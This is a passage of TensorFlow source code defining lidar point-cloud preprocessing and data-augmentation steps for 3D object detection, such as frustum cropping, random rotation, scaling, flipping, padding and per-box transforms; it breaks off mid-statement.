    if 'points_padding' in features.lasers:
      # Suffices to just update the padding.
      features.lasers.points_padding = 1. - tf.cast(points_mask, tf.float32)
    else:
      # No padding tensor: physically drop the masked points instead.
      features.lasers = features.lasers.Transform(
          _GetApplyPointMaskFn(points_mask))

    return features

  def TransformShapes(self, shapes):
    """Shapes are unchanged (padding-based) or dynamic (mask-based)."""
    return shapes

  def TransformDTypes(self, dtypes):
    """No dtype changes."""
    return dtypes
class KITTIDropPointsOutOfFrustum(Preprocessor):
  """Drops laser points that are outside of the camera frustum.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]
  - images.velo_to_image_plane of shape [3, 4]
  - images.width of shape [1]
  - images.height of shape [1]

  and optionally points_padding of shape [P] corresponding to the padding.
  if points_padding is None, then all points are considered valid.

  Modifies the following features:
    lasers.points_xyz, lasers.points_feature, lasers.points_padding, and
    optionally lasers.points_label, lasers.points_bbox_id so that
    points outside the frustum have padding set to 1 or are removed.
  """

  def TransformFeatures(self, features):
    """Masks or removes points that the camera cannot see."""
    # Drop points behind the car (behind x-axis = 0).
    images = features.images
    front_indices = features.lasers.points_xyz[:, 0] >= 0

    if 'points_padding' not in features.lasers:
      # Keep tensors unpadded and small using boolean_mask.
      features.lasers.points_xyz = tf.boolean_mask(features.lasers.points_xyz,
                                                   front_indices)
      features.lasers.points_feature = tf.boolean_mask(
          features.lasers.points_feature, front_indices)

    # Drop those points outside the image plane.
    # Project each (x, y, z) point into pixel coordinates.
    points_image = geometry.PointsToImagePlane(features.lasers.points_xyz,
                                               images.velo_to_image_plane)
    in_image_plane = (
        (points_image[:, 0] >= 0) &
        (points_image[:, 0] <= tf.cast(images.width, tf.float32)) &
        (points_image[:, 1] >= 0) &
        (points_image[:, 1] <= tf.cast(images.height, tf.float32)))

    if 'points_padding' in features.lasers:
      # Update padding to only include front indices and in image plane.
      points_mask = tf.cast(1 - features.lasers.points_padding, tf.bool)
      points_mask &= front_indices
      points_mask &= in_image_plane
      features.lasers.points_padding = 1. - tf.cast(points_mask, tf.float32)
    else:
      # Front points were already removed above, so only the image-plane mask
      # remains to be applied here.
      features.lasers = features.lasers.Transform(
          _GetApplyPointMaskFn(in_image_plane))
    return features

  def TransformShapes(self, shapes):
    """Shapes are unchanged (padding-based) or dynamic (mask-based)."""
    return shapes

  def TransformDTypes(self, dtypes):
    """No dtype changes."""
    return dtypes
class RandomWorldRotationAboutZAxis(Preprocessor):
  """Rotates the world randomly as a form of data augmentation.

  Rotations are performed around the *z-axis*. This assumes that the car is
  always level. In general, we'd like to instead rotate the car on the spot,
  this would then make sense for cases where the car is on a slope.

  When there are leading dimensions, this will rotate the boxes with the same
  transformation across all the frames. This is useful when the input is a
  sequence of frames from the same run segment.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [..., 3]
  - labels.bboxes_3d of shape [..., 7]

  Modifies the following features:
    lasers.points_xyz, labels.bboxes_3d with the same rotation applied to both.

  Adds the following features:
    world_rot_z which contains the rotation applied to the example.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'max_rotation', None,
        'The rotation amount will be randomly picked from '
        '[-max_rotation, max_rotation).')
    p.Define(
        'include_world_rot_z', True,
        'Whether to include the applied rotation as an additional tensor. '
        'It can be helpful to disable this when using the preprocessor in a '
        'way that expects the structure of the features to be the same '
        '(e.g., as a branch in tf.cond).')
    return p

  def __init__(self, params):
    """Validates that a rotation bound was configured."""
    super().__init__(params)
    p = self.params
    if p.max_rotation is None:
      raise ValueError('max_rotation needs to be specified, instead of None.')

  def TransformFeatures(self, features):
    """Applies one random z-rotation to points and boxes alike."""
    p = self.params
    rot = tf.random.uniform((),
                            minval=-p.max_rotation,
                            maxval=p.max_rotation,
                            seed=p.random_seed)

    # Rotating about the z-axis is equal to experiencing yaw.
    pose = [0., 0., 0., rot, 0., 0.]

    # Rotate points.
    features.lasers.points_xyz = geometry.CoordinateTransform(
        features.lasers.points_xyz, pose)

    # Rotate bboxes, note that heading has a special case.
    bboxes_xyz = features.labels.bboxes_3d[..., :3]
    bboxes_dims = features.labels.bboxes_3d[..., 3:6]
    bboxes_rot = features.labels.bboxes_3d[..., 6:]

    bboxes_xyz = geometry.CoordinateTransform(bboxes_xyz, pose)

    # The heading correction should subtract rot from the bboxes rotations.
    bboxes_rot = geometry.WrapAngleRad(bboxes_rot - rot)

    features.labels.bboxes_3d = tf.concat([bboxes_xyz, bboxes_dims, bboxes_rot],
                                          axis=-1)
    if p.include_world_rot_z:
      features.world_rot_z = rot
    return features

  def TransformShapes(self, shapes):
    """Optionally adds the scalar shape of the applied rotation."""
    if self.params.include_world_rot_z:
      shapes.world_rot_z = tf.TensorShape([])
    return shapes

  def TransformDTypes(self, dtypes):
    """Optionally adds the dtype of the applied rotation."""
    if self.params.include_world_rot_z:
      dtypes.world_rot_z = tf.float32
    return dtypes
class DropPointsOutOfFrustum(Preprocessor):
  """Drops points outside of pre-defined theta / phi ranges.

  Note that the ranges for keep_phi_range can be negative, this is because the
  phi values wrap around 2*pi. Thus, a valid range that filters the 90 deg
  frontal field of view of the car can be specified as [-pi/4, pi/4].

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]

  Modifies the following features:
  - lasers.points_xyz removing any points out of frustum.
  - lasers.points_feature removing any points out of frustum.

  Note: We expect a downstream processor that filters out boxes with few points
  to drop the corresponding bboxes.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('keep_theta_range', (0., np.pi),
             'Only points that have theta coordinates within this range.')
    p.Define('keep_phi_range', (0., 2. * np.pi),
             'Only points that have phi coordinates within this range.')
    return p

  def TransformFeatures(self, features):
    """Removes points whose spherical angles fall outside the keep ranges.

    Raises:
      ValueError: If lasers are padded, or if the configured theta/phi ranges
        are out of bounds or inverted.
    """
    p = self.params

    if 'points_padding' in features.lasers:
      raise ValueError('DropPointsOutOfFrustum preprocessor does not support '
                       'padded lasers.')

    points_xyz = features.lasers.points_xyz
    points_feature = features.lasers.points_feature

    min_theta, max_theta = p.keep_theta_range
    if (min_theta < 0. or min_theta > np.pi or max_theta < 0. or
        max_theta > np.pi):
      raise ValueError('Valid values for theta are between 0 and pi, '
                       'keep_theta_range={}'.format(p.keep_theta_range))

    if min_theta > max_theta:
      raise ValueError('min_theta must be <= max_theta, '
                       'keep_theta_range={}'.format(p.keep_theta_range))

    min_phi, max_phi = p.keep_phi_range
    if (min_phi < -2. * np.pi or min_phi > 2. * np.pi or
        max_phi < -2. * np.pi or max_phi > 2. * np.pi):
      raise ValueError('Valid values for phi are between -2*pi and 2*pi,'
                       'keep_phi_range={}'.format(p.keep_phi_range))

    if min_phi > max_phi:
      raise ValueError('min_phi must be <= max_phi, '
                       'keep_phi_range={}'.format(p.keep_phi_range))

    _, theta, phi = tf.unstack(
        geometry.SphericalCoordinatesTransform(points_xyz), axis=-1)

    # phi is returned in range [-pi, pi], we shift the values which are between
    # [-pi, 0] to be [pi, 2pi] instead to make the logic below easier to follow.
    # Hence, all phi values after this will be [0, 2pi].
    phi = tf.where(phi >= 0., phi, 2. * np.pi + phi)

    # Theta does not have circular boundary conditions, a simple check suffices.
    points_mask = (theta >= min_theta) & (theta <= max_theta)

    if min_phi < 0. and max_phi < 0.:
      # Both are less than zero, we just add 2pi and will use the regular
      # check.
      min_phi += 2. * np.pi
      max_phi += 2. * np.pi

    if min_phi < 0.:
      # The minimum threshold is below 0, so we split into checking between
      # (0 to min_phi) and (0 to max_phi). Note that min_phi is negative, but
      # phi is always positive, so we take 2*pi + min_phi to get the range of
      # appropriate values.
      points_mask &= (phi >= (2. * np.pi + min_phi)) | (phi <= max_phi)
    else:
      # Both must be greater than 0 if we get to this condition.
      assert min_phi >= 0.
      assert max_phi >= 0.
      points_mask &= (phi >= min_phi) & (phi <= max_phi)

    features.lasers.points_xyz = tf.boolean_mask(points_xyz, points_mask)
    features.lasers.points_feature = tf.boolean_mask(points_feature,
                                                     points_mask)
    return features

  def TransformShapes(self, shapes):
    """Shapes become dynamic since points are physically removed."""
    return shapes

  def TransformDTypes(self, dtypes):
    """No dtype changes."""
    return dtypes
class DropBoxesOutOfRange(Preprocessor):
  """Drops boxes outside of pre-defined x/y/z ranges (boundaries inclusive).

  This preprocessor expects features to contain the following keys:
  - labels.bboxes_3d of shape [N, 7]
  - labels.bboxes_3d_mask of shape [N]

  Modifies the following features:
  - labels.bboxes_3d_mask to mask out any additional boxes.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('keep_x_range', (-np.inf, np.inf),
             'Only boxes that have x coordinates within this range are kept.')
    p.Define('keep_y_range', (-np.inf, np.inf),
             'Only boxes that have y coordinates within this range are kept.')
    p.Define('keep_z_range', (-np.inf, np.inf),
             'Only boxes that have z coordinates within this range are kept.')
    return p

  def TransformFeatures(self, features):
    """Zeros the mask of every box whose extent leaves the keep ranges."""
    p = self.params

    min_x, max_x = p.keep_x_range
    min_y, max_y = p.keep_y_range
    min_z, max_z = p.keep_z_range

    # Short-circuit if all ranges are set to -inf, inf.
    if (np.all(np.isneginf([min_x, min_y, min_z])) and
        np.all(np.isposinf([max_x, max_y, max_z]))):
      return features

    # For each bounding box, compute whether any of its extrema
    # fall outside of the range.
    bboxes_3d_corners = geometry.BBoxCorners(
        features.labels.bboxes_3d[tf.newaxis, ...])[0]
    bboxes_3d_corners = py_utils.HasShape(bboxes_3d_corners, [-1, 8, 3])

    # Min/max over the 8 corners of each box, per axis.
    min_bbox_x = tf.reduce_min(bboxes_3d_corners[:, :, 0], axis=-1)
    max_bbox_x = tf.reduce_max(bboxes_3d_corners[:, :, 0], axis=-1)

    min_bbox_y = tf.reduce_min(bboxes_3d_corners[:, :, 1], axis=-1)
    max_bbox_y = tf.reduce_max(bboxes_3d_corners[:, :, 1], axis=-1)

    min_bbox_z = tf.reduce_min(bboxes_3d_corners[:, :, 2], axis=-1)
    max_bbox_z = tf.reduce_max(bboxes_3d_corners[:, :, 2], axis=-1)

    # A box is kept only if it is entirely inside the range on every axis.
    mask = (
        tf.math.logical_and(min_bbox_x >= min_x, max_bbox_x <= max_x)
        & tf.math.logical_and(min_bbox_y >= min_y, max_bbox_y <= max_y)
        & tf.math.logical_and(min_bbox_z >= min_z, max_bbox_z <= max_z))

    max_num_boxes = py_utils.GetShape(features.labels.bboxes_3d_mask)
    mask = py_utils.HasShape(mask, max_num_boxes)

    features.labels.bboxes_3d_mask *= tf.cast(mask, tf.float32)
    return features

  def TransformShapes(self, shapes):
    """Shapes are unchanged; only the mask values are updated."""
    return shapes

  def TransformDTypes(self, dtypes):
    """No dtype changes."""
    return dtypes
class PadLaserFeatures(Preprocessor):
  """Pads laser features so that the dimensions are fixed.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]

  and optionally points_padding of shape [P] corresponding to the padding.
  if points_padding is None, then all points are considered valid.

  Modifies the following features:
    lasers.points_xyz and lasers.points_feature to add padding.
    Optionally also modifies lasers.points_label and lasers.points_bbox_id
    if they exist to add padding.
  Modifies/adds the following features:
    labels.points_padding of shape [P] representing the padding.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('max_num_points', 128500,
             'Max number of points to pad the points to.')
    return p

  def TransformFeatures(self, features):
    """Shuffles then pads/trims every laser tensor to `max_num_points`."""
    p = self.params

    if 'points_padding' in features.lasers:
      # Remove already-padded points first so only real points are shuffled.
      points_mask = 1 - features.lasers.points_padding
      points_mask = tf.cast(points_mask, tf.bool)
      features.lasers = features.lasers.Transform(
          _GetApplyPointMaskFn(points_mask))

    # Temporarily encode validity as 1.0; PadOrTrimTo fills with 0.0, and the
    # final inversion below turns this into the usual 1.0 == padded convention.
    npoints = tf.shape(features.lasers.points_xyz)[0]
    features.lasers.points_padding = tf.ones([npoints])

    shuffled_idx = tf.range(npoints)
    shuffled_idx = tf.random.shuffle(shuffled_idx, seed=p.random_seed)

    def _PadOrTrimFn(points_tensor):
      # Shuffle before trimming so we have a random sampling
      points_tensor = tf.gather(points_tensor, shuffled_idx)
      return py_utils.PadOrTrimTo(points_tensor, [p.max_num_points] +
                                  points_tensor.shape[1:].as_list())

    features.lasers = features.lasers.Transform(_PadOrTrimFn)
    features.lasers.points_padding = 1.0 - features.lasers.points_padding
    return features

  def TransformShapes(self, shapes):
    """Fixes the leading dimension of every laser tensor to max_num_points."""
    p = self.params

    def _TransformShape(points_shape):
      return tf.TensorShape([p.max_num_points] + points_shape[1:].as_list())

    shapes.lasers = shapes.lasers.Transform(_TransformShape)
    shapes.lasers.points_padding = tf.TensorShape([p.max_num_points])
    return shapes

  def TransformDTypes(self, dtypes):
    """Adds the dtype of the padding tensor."""
    dtypes.lasers.points_padding = tf.float32
    return dtypes
class WorldScaling(Preprocessor):
  """Scale the world randomly as a form of data augmentation.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - labels.bboxes_3d of shape [L, 7]

  Modifies the following features:
    lasers.points_xyz, labels.bboxes_3d with the same scaling applied to both.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('scaling', None, 'The scaling range.')
    return p

  def __init__(self, params):
    super().__init__(params)
    p = self.params
    if p.scaling is None:
      raise ValueError('scaling needs to be specified, instead of None.')
    if len(p.scaling) != 2:
      raise ValueError('scaling needs to be a list of two elements.')

  def TransformFeatures(self, features):
    """Draws one scale factor and applies it to points and boxes alike."""
    p = self.params
    scale = tf.random.uniform((),
                              minval=p.scaling[0],
                              maxval=p.scaling[1],
                              seed=p.random_seed,
                              dtype=features.lasers.points_xyz.dtype)

    # Scale the point cloud [num_points, 3].
    features.lasers.points_xyz = features.lasers.points_xyz * scale

    # Box centers and sizes scale with the world; heading angles do not.
    scaled_centers = features.labels.bboxes_3d[..., :3] * scale
    scaled_dims = features.labels.bboxes_3d[..., 3:6] * scale
    headings = features.labels.bboxes_3d[..., 6:]
    features.labels.bboxes_3d = tf.concat(
        [scaled_centers, scaled_dims, headings], axis=-1)
    return features

  def TransformShapes(self, shapes):
    return shapes

  def TransformDTypes(self, dtypes):
    return dtypes
class RandomDropLaserPoints(Preprocessor):
  """Randomly dropout laser points and the corresponding features.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]

  Modifies the following features:
    lasers.points_xyz, lasers.points_feature.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('keep_prob', 0.95, 'Probability for keeping points.')
    return p

  def TransformFeatures(self, features):
    """Keeps each point independently with probability p.keep_prob."""
    p = self.params
    total_points, _ = py_utils.GetShape(features.lasers.points_xyz)

    # One uniform draw per point; the point survives when its draw falls
    # below keep_prob.
    uniform_draws = tf.random.uniform([total_points],
                                      minval=0,
                                      maxval=1,
                                      seed=p.random_seed)
    survivor_mask = uniform_draws < p.keep_prob

    if 'points_padding' in features.lasers:
      # Padded layout: keep the tensor shapes and flag dropped points as
      # padding instead of removing them.
      valid_mask = 1 - features.lasers.points_padding
      valid_mask = valid_mask * tf.cast(survivor_mask, tf.float32)
      features.lasers.points_padding = 1 - valid_mask
    else:
      # Unpadded layout: physically remove the dropped rows.
      features.lasers.points_xyz = tf.boolean_mask(features.lasers.points_xyz,
                                                   survivor_mask)
      features.lasers.points_feature = tf.boolean_mask(
          features.lasers.points_feature, survivor_mask)
    return features

  def TransformShapes(self, shapes):
    return shapes

  def TransformDTypes(self, dtypes):
    return dtypes
class RandomFlipY(Preprocessor):
  """Flip the world along axis Y as a form of data augmentation.

  When there are leading dimensions, this will flip the boxes with the same
  transformation across all the frames. This is useful when the input is a
  sequence of frames from the same run segment.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [..., 3]
  - labels.bboxes_3d of shape [..., 7]

  Modifies the following features:
    lasers.points_xyz, labels.bboxes_3d with the same flipping applied to both.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('flip_probability', 0.5, 'Probability of flipping.')
    return p

  def TransformFeatures(self, features):
    """Mirrors points and boxes about the XZ plane with flip_probability."""
    p = self.params
    # A uniform draw in [0, 1) lands in [1 - flip_probability, 1) exactly
    # flip_probability of the time.
    draw = tf.random.uniform((), minval=0.0, maxval=1.0, seed=p.random_seed)
    flip = draw >= 1. - p.flip_probability

    def _MaybeNegateY(xyz):
      """Returns `xyz` with its Y column negated when `flip` is on."""
      y = tf.where(flip, -xyz[..., 1:2], xyz[..., 1:2])
      return tf.concat([xyz[..., 0:1], y, xyz[..., 2:3]], axis=-1)

    # Mirror the point cloud.
    features.lasers.points_xyz = _MaybeNegateY(features.lasers.points_xyz)

    # Mirror the box centers the same way, and negate (with angle wrapping)
    # the heading to compensate for the reflection.
    bboxes_3d = features.labels.bboxes_3d
    centers = _MaybeNegateY(bboxes_3d[..., :3])
    dims = bboxes_3d[..., 3:6]
    headings = bboxes_3d[..., 6:]
    headings = tf.where(flip, geometry.WrapAngleRad(-headings), headings)
    features.labels.bboxes_3d = tf.concat([centers, dims, headings], axis=-1)
    return features

  def TransformShapes(self, shapes):
    return shapes

  def TransformDTypes(self, dtypes):
    return dtypes
class GlobalTranslateNoise(Preprocessor):
  """Add global translation noise of xyz coordinates to points and boxes.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - labels.bboxes_3d of shape [L, 7]

  Modifies the following features:
    lasers.points_xyz, labels.bboxes_3d with the same
    random translation noise applied to both.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('noise_std', [0.2, 0.2, 0.2],
             'Standard deviation of translation noise per axis.')
    return p

  def TransformFeatures(self, features):
    """Shifts points and box centers by one shared random xyz offset."""
    p = self.params
    # Derive three distinct seeds from the base seed so the per-axis draws
    # differ even when a fixed seed is supplied.
    base_seed = p.random_seed
    axis_seeds = [
        base_seed,
        None if base_seed is None else base_seed + 1,
        None if base_seed is None else base_seed + 2,
    ]
    noise_xyz = [
        tf.random.normal((), mean=0.0, stddev=std, seed=seed)
        for std, seed in zip(p.noise_std, axis_seeds)
    ]
    # Translation-only pose: the three trailing rotation components are zero.
    pose = tf.stack(noise_xyz + [0.0, 0.0, 0.0], axis=0)

    # Translate points.
    features.lasers.points_xyz = geometry.CoordinateTransform(
        features.lasers.points_xyz, pose)

    # Translate boxes: only the centers move; sizes and headings are kept.
    box_centers = geometry.CoordinateTransform(
        features.labels.bboxes_3d[..., :3], pose)
    features.labels.bboxes_3d = tf.concat(
        [box_centers, features.labels.bboxes_3d[..., 3:]], axis=-1)
    return features

  def TransformShapes(self, shapes):
    return shapes

  def TransformDTypes(self, dtypes):
    return dtypes
class RandomBBoxTransform(Preprocessor):
  """Randomly transform bounding boxes and the points inside them.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]
  - lasers.points_padding of shape [P]
  - labels.bboxes_3d of shape [L, 7]
  - labels.bboxes_3d_mask of shape [L]

  Modifies the following features:
    lasers.points_{xyz,feature,padding}, labels.bboxes_3d with the
    transformed bounding boxes and points.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'max_rotation', None,
        'The rotation amount will be randomly picked from '
        '[-max_rotation, max_rotation).')
    # At the moment we don't use this because it can cause boxes to collide with
    # each other. We need to compute box intersections when deciding whether to
    # apply the translation jitter. Theoretically we should also do this for
    # rotation.
    p.Define('noise_std', [0.0, 0.0, 0.0],
             'Standard deviation of translation noise per axis.')
    p.Define(
        'max_scaling', None,
        'An optional float list of length 3. When max_scaling is not none, '
        'delta parameters s_x, s_y, s_z are drawn from '
        '[-max_scaling[i], max_scaling[i]] where i is in [0, 2].')
    # Fixed: the two literals below previously concatenated to 'aredrawn'.
    p.Define(
        'max_shearing', None,
        'An optional float list of length 6. When max_shearing is not none, '
        'shearing parameters sh_x^y, sh_x^z, sh_y^x, sh_y^z, sh_z^x, sh_z^y '
        'are drawn from [-max_shearing[i], max_shearing[i]], where i is in '
        '[0, 5].')
    p.Define(
        'max_num_points_per_bbox', 16384,
        'The maximum number of points that fall within a bounding box. '
        'Bounding boxes with more points than this value will '
        'have some points dropped.')
    return p

  def __init__(self, params):
    super().__init__(params)
    p = self.params
    if p.max_rotation is None:
      raise ValueError('max_rotation needs to be specified, instead of None.')
    if p.max_scaling is not None:
      if len(p.max_scaling) != 3:
        raise ValueError('max_scaling needs to be specified as either None or '
                         'list of 3 floating point numbers, instead of {}.'
                         ''.format(p.max_scaling))
    if p.max_shearing is not None:
      if len(p.max_shearing) != 6:
        raise ValueError('max_shearing needs to be specified as either None or '
                         'list of 6 floating point numbers, instead of {}.'
                         ''.format(p.max_shearing))

  def _Foreground(self, features, points_xyz, points_feature, real_bboxes_3d,
                  points_in_bbox_mask, rotation, translate_pose, transform_fn):
    """Extract and transform foreground points and features.

    Args:
      features: NestedMap of input features.
      points_xyz: [P, 3] coordinates of the (unpadded) points.
      points_feature: [P, F] features of the (unpadded) points.
      real_bboxes_3d: [L, 7] masked-in bounding boxes for the scene.
      points_in_bbox_mask: [P, L] bool point/box membership mask.
      rotation: [L] per-box rotation angles.
      translate_pose: [L, 3] per-box translation jitter.
      transform_fn: loop body applied to each box via py_utils.ForLoop.

    Returns:
      Tuple of (fg_xyz, fg_feature) holding the transformed in-box points
      and their features.
    """
    out_bbox_xyz, out_bbox_feature, out_bbox_mask = self._ForLoopBuffers(
        features)

    # Only iterate over the actual number of boxes in the scene.
    actual_num_bboxes = tf.reduce_sum(
        tf.cast(features.labels.bboxes_3d_mask, tf.int32))

    ret = py_utils.ForLoop(
        body=transform_fn,
        start=0,
        limit=actual_num_bboxes,
        delta=1,
        loop_state=py_utils.NestedMap(
            points_xyz=points_xyz,
            points_feature=points_feature,
            bboxes_3d=real_bboxes_3d,
            points_in_bbox_mask=points_in_bbox_mask,
            rotation=rotation,
            translate_pose=translate_pose,
            out_bbox_points=out_bbox_xyz,
            out_bbox_feature=out_bbox_feature,
            out_bbox_mask=out_bbox_mask))

    # Gather all of the transformed points and features.
    out_bbox_xyz = tf.reshape(ret.out_bbox_points, [-1, 3])
    num_features = features.lasers.points_feature.shape[-1]
    out_bbox_feature = tf.reshape(ret.out_bbox_feature, [-1, num_features])
    out_bbox_mask = tf.cast(tf.reshape(ret.out_bbox_mask, [-1]), tf.bool)
    fg_xyz = tf.boolean_mask(out_bbox_xyz, out_bbox_mask)
    fg_feature = tf.boolean_mask(out_bbox_feature, out_bbox_mask)
    return fg_xyz, fg_feature

  def _Background(self, points_xyz, points_feature, points_in_bbox_mask):
    """Returns the points/features that lie outside every bounding box."""
    # If a point is in any bounding box, it is a foreground point.
    foreground_points_mask = tf.reduce_any(points_in_bbox_mask, axis=-1)
    # All others are background. We rotate all of the foreground points to
    # final_points_* and keep the background points unchanged
    background_points_mask = tf.math.logical_not(foreground_points_mask)
    background_points_xyz = tf.boolean_mask(points_xyz, background_points_mask)
    background_points_feature = tf.boolean_mask(points_feature,
                                                background_points_mask)
    return background_points_xyz, background_points_feature

  def _ForLoopBuffers(self, features):
    """Create and return the buffers for the for loop."""
    p = self.params
    bboxes_3d = features.labels.bboxes_3d

    # Compute the shapes and create the buffers for the For loop.
    max_num_bboxes = tf.shape(bboxes_3d)[0]
    per_box_shape = [max_num_bboxes, p.max_num_points_per_bbox, 3]
    out_bbox_points = inplace_ops.empty(
        per_box_shape, dtype=tf.float32, init=True)

    num_features = features.lasers.points_feature.shape[-1]
    bbox_feature_shape = [
        max_num_bboxes, p.max_num_points_per_bbox, num_features
    ]
    out_bbox_feature = inplace_ops.empty(
        bbox_feature_shape, dtype=tf.float32, init=True)

    per_box_mask_shape = [max_num_bboxes, p.max_num_points_per_bbox]
    out_bbox_mask = inplace_ops.empty(
        per_box_mask_shape, dtype=tf.float32, init=True)

    return out_bbox_points, out_bbox_feature, out_bbox_mask

  def TransformFeatures(self, features):
    """Applies per-box rotation/jitter (and optional scaling/shearing)."""
    p = self.params

    num_features = features.lasers.points_feature.shape[-1]

    def Transform(i, state):
      """Transform the points in bounding box `i`."""
      state.points_xyz = tf.reshape(state.points_xyz, [-1, 3])
      bbox_mask = tf.reshape(state.points_in_bbox_mask[:, i], [-1])

      # Fetch only the points in the bounding box.
      points_xyz_masked = tf.boolean_mask(state.points_xyz, bbox_mask)
      points_feature_masked = tf.boolean_mask(state.points_feature, bbox_mask)

      num_points = tf.shape(points_xyz_masked)[0]

      # TODO(vrv): Fold the following into a single transformation
      # matrix.
      #
      # Translate the box to the origin, then rotate the desired
      # rotation angle.
      translation_vec = state.bboxes_3d[i, 0:3]
      rotation_vec = [state.rotation[i], 0., 0.]
      pose = tf.concat([-translation_vec, rotation_vec], axis=0)
      points_xyz_adj = geometry.CoordinateTransform(points_xyz_masked, pose)
      if p.max_scaling is not None or p.max_shearing is not None:
        # Translate the points in the bounding box by moving dz/2 so that the
        # bottom of the bounding box is at Z = 0 when any of the two
        # (max_scaling or max_shearing) is not None
        translation_scale_or_shear = tf.stack(
            [0., 0., state.bboxes_3d[i, 5] / 2], axis=0)
        pose1 = tf.concat([translation_scale_or_shear, [0., 0., 0.]], axis=0)
        points_xyz_adj = geometry.CoordinateTransform(points_xyz_adj, pose1)
      else:
        translation_scale_or_shear = tf.stack([0., 0., 0.], axis=0)

      if p.max_scaling is not None:
        # Perform scaling to the point cloud
        # Scaling matrix
        # [[s_x+1 0 0]
        # [ 0 s_y+1 0]
        # [ 0 0 s_z+1]]
        sx = tf.random.uniform([],
                               minval=-p.max_scaling[0],
                               maxval=p.max_scaling[0],
                               seed=p.random_seed)
        sy = tf.random.uniform([],
                               minval=-p.max_scaling[1],
                               maxval=p.max_scaling[1],
                               seed=p.random_seed)
        sz = tf.random.uniform([],
                               minval=-p.max_scaling[2],
                               maxval=p.max_scaling[2],
                               seed=p.random_seed)
        scaling_matrix = tf.stack(
            [[sx + 1., 0., 0.], [0., sy + 1., 0.], [0., 0., sz + 1.]], axis=0)

        points_xyz_adj = tf.einsum('ij,kj->ki', scaling_matrix, points_xyz_adj)

      if p.max_shearing is not None:
        # Perform shearing to the point cloud
        # Shearing matrix
        # [[1 sh_x^y sh_x^z]
        # [sh_y^x 1 sh_y^z]
        # [sh_z^x sh_z^y 1 ]]
        sxy = tf.random.uniform([],
                                minval=-p.max_shearing[0],
                                maxval=p.max_shearing[0],
                                seed=p.random_seed)
        sxz = tf.random.uniform([],
                                minval=-p.max_shearing[1],
                                maxval=p.max_shearing[1],
                                seed=p.random_seed)
        syx = tf.random.uniform([],
                                minval=-p.max_shearing[2],
                                maxval=p.max_shearing[2],
                                seed=p.random_seed)
        syz = tf.random.uniform([],
                                minval=-p.max_shearing[3],
                                maxval=p.max_shearing[3],
                                seed=p.random_seed)
        szx = tf.random.uniform([],
                                minval=-p.max_shearing[4],
                                maxval=p.max_shearing[4],
                                seed=p.random_seed)
        szy = tf.random.uniform([],
                                minval=-p.max_shearing[5],
                                maxval=p.max_shearing[5],
                                seed=p.random_seed)
        shearing_matrix = tf.stack(
            [[1., sxy, sxz], [syx, 1., syz], [szx, szy, 1.]], axis=0)

        points_xyz_adj = tf.einsum('ij,kj->ki', shearing_matrix, points_xyz_adj)

      # Translate the points back, adding noise if needed.
      translation_with_noise = (
          translation_vec - translation_scale_or_shear +
          state.translate_pose[i])
      pose2 = tf.concat([translation_with_noise, [0., 0., 0.]], axis=0)
      final_points_xyz = geometry.CoordinateTransform(points_xyz_adj, pose2)

      # final_points_xyz is an [M, 3] Tensor where M is the number of points in
      # the box.
      points_mask = tf.ones([num_points], dtype=tf.float32)

      final_points_xyz = py_utils.PadOrTrimTo(final_points_xyz,
                                              [p.max_num_points_per_bbox, 3])
      final_points_feature = py_utils.PadOrTrimTo(
          points_feature_masked, [p.max_num_points_per_bbox, num_features])
      points_mask = py_utils.PadOrTrimTo(points_mask,
                                         [p.max_num_points_per_bbox])
      state.out_bbox_points = inplace_ops.alias_inplace_update(
          state.out_bbox_points, [i], tf.expand_dims(final_points_xyz, 0))
      state.out_bbox_feature = inplace_ops.alias_inplace_update(
          state.out_bbox_feature, [i], tf.expand_dims(final_points_feature, 0))
      state.out_bbox_mask = inplace_ops.alias_inplace_update(
          state.out_bbox_mask, [i], tf.expand_dims(points_mask, 0))

      return state

    # Get the points and features that reside in boxes.
    if 'points_padding' in features.lasers:
      points_mask = 1 - features.lasers.points_padding
      points_xyz = tf.boolean_mask(features.lasers.points_xyz, points_mask)
      points_feature = tf.boolean_mask(features.lasers.points_feature,
                                       points_mask)
    else:
      points_xyz = features.lasers.points_xyz
      points_feature = features.lasers.points_feature

    # Fetch real bounding boxes and compute point mask.
    real_bboxes_3d = tf.boolean_mask(features.labels.bboxes_3d,
                                     features.labels.bboxes_3d_mask)
    points_in_bbox_mask = geometry.IsWithinBBox3D(points_xyz, real_bboxes_3d)

    # Choose a random rotation for every real box.
    num_boxes = tf.shape(real_bboxes_3d)[0]
    rotation = tf.random.uniform([num_boxes],
                                 minval=-p.max_rotation,
                                 maxval=p.max_rotation,
                                 seed=p.random_seed)

    # Use three different seeds but the same base seed so that the per-axis
    # translation noise values are different.
    base_seed = p.random_seed
    x_seed = base_seed
    y_seed = None if base_seed is None else base_seed + 1
    z_seed = None if base_seed is None else base_seed + 2
    random_translate_x = tf.random.normal([num_boxes],
                                          mean=0.0,
                                          stddev=p.noise_std[0],
                                          seed=x_seed)
    random_translate_y = tf.random.normal([num_boxes],
                                          mean=0.0,
                                          stddev=p.noise_std[1],
                                          seed=y_seed)
    random_translate_z = tf.random.normal([num_boxes],
                                          mean=0.0,
                                          stddev=p.noise_std[2],
                                          seed=z_seed)

    translate_pose = tf.stack(
